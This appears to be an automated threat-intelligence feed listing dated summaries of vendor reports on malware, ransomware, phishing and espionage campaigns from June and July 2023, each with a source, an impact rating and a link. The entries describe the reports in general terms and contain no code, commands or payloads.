- Mandiant researchers have observed a threefold increase in the number of attacks using infected USB drives to steal secrets. One campaign, named ‘Sogu,’ is attributed to the Chinese espionage threat group ‘TEMP.HEX,’ and another, named ‘Snowydrive,’ is attributed to UNC4698 and targets oil and gas firms in Asia.
Source:
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets
—
- Intel Source:
- Talos
- Intel Name:
- RedDriver_targets_Chinese_speakers_and_internet_cafes
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The specific information on this subpage describes an undocumented browser hijacker called RedDriver. It explains that RedDriver targets Chinese speakers and internet cafes, and uses the Windows Filtering Platform to intercept browser traffic. It bypasses driver signature enforcement policies and utilizes stolen certificates. The authors of RedDriver are skilled in driver development and have deep knowledge of the Windows operating system. The subpage also includes a list of domains associated with RedDriver and provides various software and support resources offered by Talos.
Source:
https://blog.talosintelligence.com/undocumented-reddriver/
—
- Intel Source:
- Wiz
- Intel Name:
- The_cloud_workloads_targeted_by_Python_based_fileless_malware
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- This subpage discusses the PyLoose fileless malware that targets cloud workloads. It provides information on the attack flow, including initial access, Python script drop, fileless execution, and in-memory XMRig execution. It mentions the attacker’s Monero wallet address and provides details about the PyLoose loader’s associated files and hash values. The subpage also references other articles and promotes the Wiz platform for cloud security.
Source:
https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads
—
- Intel Source:
- Huntress
- Intel Name:
- Business_Email_Compromise_hunting_details
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The subpage specifically discusses threat hunting for business email compromise (BEC) using user agents on Microsoft 365. The author shares their approach and examples of suspicious user agents. They emphasize the importance of baselining user behavior, detection technology, and prevention measures like multi-factor authentication. The subpage also includes information on the terms of use, privacy policy, legal notices, and cookie policy of Huntress, with an option to sign up for blog updates.
Source:
https://www.huntress.com/blog/threat-hunting-for-business-email-compromise-through-user-agents
—
- Intel Source:
- Blackberry
- Intel Name:
- The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor
- Date of Scan:
- 2023-07-12
- Impact:
- MEDIUM
- Summary:
- At the beginning of this month, the BlackBerry Threat researchers found two malicious documents that came from an IP address in Hungary: one sent as bait to an organization supporting Ukraine abroad, and a document targeting upcoming NATO Summit guests. BlackBerry’s analysis concludes that the threat actor known as RomCom is behind this operation. Based on BlackBerry’s internal network data analysis and the full set of cyber tools collected, the threat actor behind this campaign is believed to have run their first drills on June 22, a few days before the command-and-control (C2) mentioned in their report was registered and went live.
Source:
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
—
- Intel Source:
- Uptycs
- Intel Name:
- Deceptive_PoC_poses_hidden_backdoor
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Uptycs researchers discovered a backdoor disguised as an innocuous learning tool that targets Linux systems. Ensure removal of unauthorized SSH keys, delete the kworker file, remove the kworker path from the bashrc file, and check /tmp/.iCE-unix.pid for potential threats. Exercise caution when testing PoCs and utilize isolated environments for protection.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- Microsoft
- Intel Name:
- Storm_0978_phishing_campaign_uncovered_by_Microsoft
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Microsoft identifies Storm-0978 targeting defense and government entities in Europe and North America. Exploiting CVE-2023-36884, they employ phishing campaigns and distribute the RomCom backdoor. Storm-0978 conducts opportunistic ransomware and espionage-related operations.
—
- Intel Source:
- Zscaler
- Intel Name:
- Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- Zscaler researchers have uncovered a concerning development: a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Rootkit_acts_as_a_universal_loader
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- Trend Micro researchers observed a new signed rootkit originating from China that targets the gaming sector. The rootkit acts as a universal loader and communicates with a command-and-control infrastructure. It has passed through the Windows Hardware Quality Labs process and obtained a valid signature. It has been reported to Microsoft’s Security Response Center.
—
- Intel Source:
- ASEC
- Intel Name:
- Rekoobe_Backdoor_targeting_Linux_systems_in_Korea
- Date of Scan:
- 2023-07-11
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has been receiving reports of the Rekoobe malware from tenants in Korea for several years, and will hereby share its brief analysis. Additionally, the Rekoobe variants will be categorized along with a summary of the ones used to target Korean companies.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_malicious_batch_file
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file (*.bat). This malware is designed to download various scripts depending on the anti-malware processes, including AhnLab products, installed in the user’s environment. Based on the function names used by the malware and the downloaded URL parameters, it is suspected to have been distributed by the Kimsuky group.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_malvertising_USPS_campaign
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Malwarebytes researchers observed a recent phishing attack that was targeting both mobile and desktop users looking to track their packages via the United States Postal Service website.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057
- Date of Scan:
- 2023-07-10
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a new targeted cyber attack by the UAC-0057 group against Ukrainian public officials leveraging XLS files that contain a malicious macro spreading PicassoLoader malware. The malicious loader is capable of dropping another malicious strain dubbed njRAT to spread the infection further.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Deep_details_of_Big_Head_Ransomware_s_Variants
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Deeper analysis and updated IOCs for the Big Head ransomware variants.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing_Attacks_by_APT28_Group
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered HTML files that imitate the web interface of mail services and implement the technical capability of exfiltrating authentication data entered by the victim using HTTP POST requests. At the same time, the transfer of stolen data is carried out using previously compromised Ubiquiti devices (EdgeOS).
—
- Intel Source:
- Lab52
- Intel Name:
- Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Lab52 researchers have identified several different maldoc samples from a potential malicious campaign. The maldoc appears to be part of a campaign against Chinese-speaking users, as its content is written in Chinese. The infection chain is similar to that of the threat actor APT29; however, significant differences from APT29’s typical infection chain were identified, suggesting that this is not the same threat actor.
Source:
https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_BlackByte_ransomware_deep_analyses
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- The Microsoft Incident Response team observed a threat actor go through the full attack chain, from initial access to impact, in less than five days, causing significant business disruption for the victim organization. Their findings discovered that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives.
—
- Intel Source:
- ASEC, Ciberdefensa
- Intel Name:
- The_distribution_of_NetSupport_RAT
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- ASEC lab researchers discovered NetSupport RAT being distributed via a spear-phishing email that has recently been in circulation. Their analysis covers the whole process, from its distribution via phishing emails to its detection.
Source:
https://ciberdefensa.cat/archivos/16021
https://asec.ahnlab.com/en/55146/
—
- Intel Source:
- CISA
- Intel Name:
- Increasing_TrueBot_Malware_Attacks
- Date of Scan:
- 2023-07-09
- Impact:
- MEDIUM
- Summary:
- CISA researchers have warned about the emergence of new variants of the TrueBot malware. These variants specifically target organizations in the United States and Canada, aiming to extract sensitive data from compromised networks.
—
- Intel Source:
- Cyble
- Intel Name:
- Ransomware_Lists_Victim_Host_Information_in_Ransom_Note
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a new ransomware strain named “Underground Team ransomware.” The ransom note of the Underground Team ransomware introduces novel elements that distinguish it from typical ransom notes. In addition to guaranteeing a fair and confidential deal within a short timeframe, the group offers more than just a decryptor.
Source:
https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
—
- Intel Source:
- Proofpoint
- Intel Name:
- Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Proofpoint researchers have observed that TA453 continues to adapt its malware arsenal, deploying novel file types and targeting new operating systems, specifically sending Mac malware to one of its recent targets.
—
- Intel Source:
- Cyble
- Intel Name:
- ARCrypter_ransomware_activity
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- ARCrypter ransomware, also known as ChileLocker, gained attention in August 2022 with an attack in Chile. Soon after, researchers discovered that this ransomware had started targeting organizations worldwide. ARCrypter ransomware has been observed targeting both Windows and Linux operating systems. This year, researchers reported the existence of a new Linux variant of ARCrypter, developed using the Go programming language, as well as an updated version of the ARCrypt Windows executable. The researchers also discovered new techniques the TA uses to interact with their victims. In comparison with the older variant of ARCrypt ransomware, the researchers identified the following: the ransom note of each binary pointed to a mirror site, and the TA created dedicated chat sites hosted on Tor for each victim.
—
- Intel Source:
- Aquasec
- Intel Name:
- Analysis_of_Silentbobs_Cloud_Attack
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Aqua Nautilus researchers have identified the infrastructure of a potentially massive campaign against cloud-native environments. It is in the early stages of testing and deployment, and mainly consists of an aggressive cloud worm designed to deploy on exposed JupyterLab and Docker APIs in order to drop Tsunami malware, hijack cloud credentials, hijack resources, and further spread the worm.
Source:
https://blog.aquasec.com/threat-alert-anatomy-of-silentbobs-cloud-attack
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- ReversingLabs researchers have discovered more than a dozen malicious packages published to the npm open-source repository that appear to target application end users while also supporting email phishing campaigns targeting Microsoft 365 users.
—
- Intel Source:
- Reliaquest
- Intel Name:
- The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- The ReliaQuest researchers have responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.”
Source:
https://www.reliaquest.com/blog/gootloader-infection-credential-access/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_From_China_Targeting_Europe_in_SmugX_Campaign
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified a campaign in which a Chinese threat actor targets government entities in Europe, with a focus on foreign and domestic policy entities.
Source:
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Diving_Deep_into_Emotet_Malware_Family
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- Emotet is a malware family active since 2014, operated by a cybercrime group known as Mealybug or TA542. It has launched multiple spam campaigns since re-appearing after its takedown. Mealybug has also created multiple new modules and has repeatedly updated and improved all existing modules.
Source:
https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/
—
- Intel Source:
- Elastic
- Intel Name:
- New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. It allows operators to download and execute various payloads.
Source:
https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attackers_Targeting_North_Atlantic_Treaty_Organization
- Date of Scan:
- 2023-07-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered a website that copies the English version of the legitimate web resource of the international non-governmental organization “World Congress of Ukrainians.”
—
- Intel Source:
- Sentinelone
- Intel Name:
- Neo_Nets_eCrime_campaign_targeted_financial_institutions
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking Neo_Net, which conducted an eCrime campaign targeting clients of financial institutions, primarily in Spain and Chile. Using SMS phishing messages and fake banking pages, Neo_Net stole over 350,000 EUR and compromised the personal information of thousands of victims. The campaign involved renting out infrastructure, selling victim data, and offering a Smishing-as-a-Service platform.
Source:
https://www.sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime/
—
- Intel Source:
- Quickheal
- Intel Name:
- White_Snake_stealer_threat
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Quick Heal researchers have provided the technical aspects of the updated White Snake stealer version 1.6, offering insights into its behaviour and shedding light on its latest capabilities.
—
- Intel Source:
- Cyble
- Intel Name:
- Multiple_New_Clipper_Malware_Variants
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered several Clipper malware variants in the past, including Laplas Clipper, IBAN Clipper, Keona Clipper, and many others. Recently, they observed several new variants of Clipper malware and saw a significant number of samples related to these variants being submitted to VirusTotal. Clipper malware operates by hijacking cryptocurrency transactions, stealthily replacing the victim’s wallet address with the Threat Actors’ (TAs’) wallet address. An unsuspecting user who tries to pay from their cryptocurrency account may find the transaction diverted to an entirely different recipient (the TAs’ account instead of the intended recipient). This can lead to significant financial losses for the victim.
Source:
https://blog.cyble.com/2023/06/30/multiple-new-clipper-malware-variants-discovered-in-the-wild/
—
- Intel Source:
- Sekoia
- Intel Name:
- NoName_057_16_DDoSia_Project_Gets_an_Upgrade
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia collective NoName(057)16.
Source:
https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/
—
- Intel Source:
- Avast
- Intel Name:
- Decryption_tool_for_the_Akira_ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.
Source:
https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/
—
- Intel Source:
- Inky
- Intel Name:
- Malicious_QR_Codes_are_getting_to_employee_credentials
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- INKY recently discovered a multitude of QR code phishing emails and shared its findings.
—
- Intel Source:
- ASEC
- Intel Name:
- Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- ASEC researchers have disclosed that the Crysis ransomware’s threat actor is also using the Venus ransomware in the attacks. Crysis and Venus are both major ransomware types known to target externally exposed remote desktop services.
—
- Intel Source:
- Uptycs
- Intel Name:
- Meduza_Stealer
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Recently, while monitoring, the Uptycs Threat Research team discovered a menace named the Meduza Stealer. Created by an enigmatic actor known as ‘Meduza’, this malware has been specifically designed to target Windows users and organizations, and currently targets only ten specific countries. The Meduza Stealer’s purpose is data theft. It pilfers users’ browsing activities, extracting a wide array of browser-related data. From critical login credentials to browsing history and bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable.
Source:
https://www.uptycs.com/blog/what-is-meduza-stealer-and-how-does-it-work
—
- Intel Source:
- Sophos
- Intel Name:
- Th_connection_investigation_of_2_clients_in_2_threat_hunts
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Two clients and two threat hunts were researched for any connection between them. Using Microsoft’s cloud-security API to parse piles of disparate data led to captivating results.
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw
- Date of Scan:
- 2023-07-05
- Impact:
- HIGH
- Summary:
- Wordfence researchers have identified an unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. They also found that this vulnerability has not been adequately patched in the latest available version, 2.6.6.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_being_executed_using_DNS_TXT_records
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- The AhnLab Security Emergency response Center (ASEC) has discovered instances where malware is being executed using DNS TXT records. This method of malware execution is significant because it is not commonly utilized, making it challenging to detect and analyze.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified malicious actors using malvertising to distribute malware via cloned webpages of legitimate organizations. The distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- New_C2_Framework_Leveraging_by_MuddyWater
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have observed that the Iranian state-sponsored group dubbed MuddyWater has been using a previously unseen command-and-control (C2) framework called PhonyC2, which the actor has put to use since 2021.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Updated_GuLoader_loader
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- This blog post on the SANS Internet Storm Center website details an infection chain for the Remcos RAT malware. It explains how the infection began with a malicious email containing a zip archive, which resulted in the download of a password-protected zip file. Inside this zip file, there was a decoy audio file and a malicious Windows shortcut. The Windows shortcut triggered the execution of a VBS file with a PowerShell script, leading to further infection on the host. The post also provides indicators of compromise (IOCs) including email headers and file hashes.
—
- Intel Source:
- Cofense
- Intel Name:
- HMRC_Self_Assessment_Phish_Outsmart_SEGs
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- During the busy self-assessment season in the UK, threat actors take advantage of the heightened online activity to deceive unsuspecting individuals into revealing their sensitive information on fraudulent HM Revenue & Customs (HMRC) self-assessment websites. Phishing Defense Center (PDC) has noted this wave of attacks across various sectors and regrettably, these phishing emails often evade popular secure email gateways (SEGs) that are meant to provide protection for users. The phishing emails begin by pressuring users to immediately update their self-assessment online profile. This is a common tactic employed by threat actors to generate a deceptive perception of urgency and legitimacy.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Disguised_as_HWP_Document_File_Kimsuky
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has discovered that the Kimsuky threat group is distributing malware disguised as HWP document files. The malware is a compressed file containing a readme.txt file and an executable file with an HWP document file extension. Running the executable file decodes a PowerShell command and saves it as update.vbs in the %APPDATA% folder. The update.vbs file conducts malicious activities, including the leakage of user credentials.
—
- Intel Source:
- Morphisec
- Intel Name:
- GuLoader_Campaign_Targets_Law_Firms_in_the_US
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- Morphisec discussed the GuLoader campaign’s targeting of specific industries and highlighted its use of legitimate hosting services for distributing malware. The main focus is on the delivery of the Remcos RAT through GuLoader and how Morphisec’s AMTD technology can protect systems from these attacks.
Source:
https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with its system and honeypot. This article explains the distribution of phishing emails during the week from June 11th to June 17th, 2023 and provides statistical information on each type.
—
- Intel Source:
- vmware
- Intel Name:
- 8Base_Ransomware
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in the summer of 2023. The subpage provides information about an HTTP 403 error, but does not offer any further details.
Source:
https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- Overall, Unit 42 researchers have discovered two Cobalt Strike Team Server instances hosted online. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. The operators of these Team Server instances hide their C2 infrastructure using popular services and public cloud infrastructure providers. Additionally, the researchers have provided guidance for Palo Alto Networks customers on how to receive protection and mitigation against Cobalt Strike Beacon and other related Cobalt Strike tools.
Source:
https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2/
—
- Intel Source:
- volexity
- Intel Name:
- Charming_Kitten_updates_backdoor_called_POWERSTAR
- Date of Scan:
- 2023-07-02
- Impact:
- MEDIUM
- Summary:
- One threat actor Volexity researchers see very often is Charming Kitten, which is assumed to be operating out of Iran. Charming Kitten is primarily concerned with collecting intelligence by compromising account credentials and the email of individuals it successfully spear phishes. The new version of the POWERSTAR backdoor was analyzed by the Volexity team, leading to the discovery that Charming Kitten has been spreading this malware alongside its spear-phishing techniques.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Manic_Menagerie_2_0_threat_actor
- Date of Scan:
- 2023-07-01
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers discovered an active campaign that targeted several web hosting and IT providers in the United States and the European Union from late 2020 to late 2022. Unit 42 designates the activity associated with this campaign as CL-CRI-0021 and believes it stems from the same threat actor responsible for the previous campaign known as Manic Menagerie.
Source:
https://unit42.paloaltonetworks.com/manic-menagerie-targets-web-hosting-and-it/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_exposion_of_active_adversary_JokerSpy
- Date of Scan:
- 2023-07-01
- Impact:
- LOW
- Summary:
- The researchers at BitDefender and Elastic have discovered an active adversary deploying a novel spyware, cross-platform backdoors, and an open-source reconnaissance tool to compromise organizations with macOS devices in their fleet. Although there are not many known victims at this time, the analysis suggests that the threat actors have likely targeted other organizations. SentinelOne researchers shared the key components and indicators used in the campaign to help raise awareness and aid security teams and threat hunters.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Fast_Developing_ThirdEye_Infostealer
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- FortiGuard Labs recently discovered some suspicious-looking files. Their investigation found that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer named “ThirdEye.” While this malware is not considered sophisticated, it is designed to steal various information from compromised machines that can be used as a stepping stone for future attacks.
—
- Intel Source:
- Cofense
- Intel Name:
- Malicious_Actors_deploy_phishing_pages_to_mobile_devices
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defense Center analysts have discovered a spike in the number of malicious emails utilizing this attack vector. QR codes provide threat actors with a different tactic to encode malicious URLs in order to bypass traditional file and text detection software.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023
- Date of Scan:
- 2023-06-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring malware samples collected weekly, here for June 5-11th, 2023. They used their automatic analysis system RAPIT to categorize and respond to known malware. The top malware families for this week are Amadey, Lokibot, Guloader, AgentTesla and Formbook.
—
- Intel Source:
- Avanan
- Intel Name:
- PDF_Based_Attacks_Are_Becoming_More_Common
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Researchers from Avanan have deep-dived into PDF-based attacks and identified that the malicious PDF file masquerades as a legitimate ‘DocuSign’ document, luring unsuspecting users to a fraudulent webpage where they are asked to enter their login credentials, including the recipient’s email address.
Source:
https://www.avanan.com/blog/pdf-based-attacks-on-the-rise-heres-how-deep-learning-can-prevent-them
—
- Intel Source:
- Cyble
- Intel Name:
- Linux_Users_at_Risk_From_Akira_Ransomware
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Cyble researchers have recently shared crucial details about the activities of a newly identified ransomware group known as “Akira.” This group is actively targeting numerous organizations, compromising their sensitive data. It is worth noting that Akira ransomware has expanded its operations to include the Linux platform.
Source:
https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
—
- Intel Source:
- KrebsOnSecurity
- Intel Name:
- SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- The United Parcel Service (UPS) says fraudsters have been harvesting phone numbers and other information from its online shipment tracking tool in Canada to send highly targeted SMS phishing (a.k.a. “smishing”) messages that spoofed UPS and other top brands.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Black_Basta_ransomware_cover_of_roundup
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs analysts analyzed data on ransomware variants that have been gaining interest within their datasets and the OSINT community. Their Ransomware Roundup report shares brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-black-basta
—
- Intel Source:
- Cybergeeks
- Intel Name:
- The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- SALTWATER is a backdoor that exploits the Barracuda 0-day vulnerability CVE-2023-2868. It is a module for the Barracuda SMTP daemon called bsmtpd. The malware hooks the recv, send, and close functions using an open-source hooking library called funchook. The following functionalities are implemented: execute arbitrary commands, download and upload files, proxy functionality, and tunneling functionality.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Examination_of_Trickbot_and_Conti_Crypters
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- IBM Security X-Force researchers have deep-dived into the crypters used by the Trickbot/Conti syndicate.
Source:
https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/
—
- Intel Source:
- Cyble
- Intel Name:
- The_details_of_Wagner_Groups_Cyber_campaign
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- Cyble researchers investigated a new ransomware called Wagner. This ransomware is possibly a variant of Chaos ransomware. The researchers found that the ransom note urges users to join the PMC Wagner. It was discovered that the ransomware sample was initially submitted to VirusTotal from Russia. Because the ransom note is written in Russian, it is assumed that the ransomware may primarily target victims within Russia. The Wagner ransomware is a 32-bit binary targeting the Windows operating system.
Source:
https://blog.cyble.com/2023/06/27/unveiling-wagner-groups-cyber-recruitment/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Email_Spam_using_Modiloader_Attachments
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed two quarantined emails that had different text but the same attachment.
Source:
https://isc.sans.edu/diary/Email+Spam+with+Attachment+Modiloader/29978/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Word_Document_with_Online_Template_Attached
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a Word document that behaves like a dropper. It uses a remote Word template and makes an HTTP request to an external website.
Source:
https://isc.sans.edu/diary/Word+Document+with+an+Online+Attached+Template/29976/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot_Distributing_Tag_via_Obama_Series
- Date of Scan:
- 2023-06-24
- Impact:
- LOW
- Summary:
- Qakbot using the Obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271).
Source:
https://isc.sans.edu/diary/Qakbot+Qbot+activity+obama271+distribution+tag/29968/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware
- Date of Scan:
- 2023-06-24
- Impact:
- MEDIUM
- Summary:
- Deep Instinct researchers have observed a new strain of JavaScript dropper which is delivering next-stage payloads like Bumblebee and IcedID.
Source:
https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid
—
- Intel Source:
- TrendMicro
- Intel Name:
- An_Overview_of_Trigona_Ransomware_Various_Versions
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The Trigona ransomware is a relatively new ransomware family that began activities around late October 2022 — although samples of it existed as early as June 2022. Since then, Trigona’s operators have remained highly active, and in fact, have been continuously updating their ransomware binaries.
Source:
https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon
- Date of Scan:
- 2023-06-23
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified that the Chinese cyber espionage actor known as Camaro Dragon is leveraging a new strain of self-propagating malware that spreads through compromised USB drives.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Paloalto researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
Source:
https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
—
- Intel Source:
- Microsoft
- Intel Name:
- Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Microsoft researchers have identified that Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_of_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
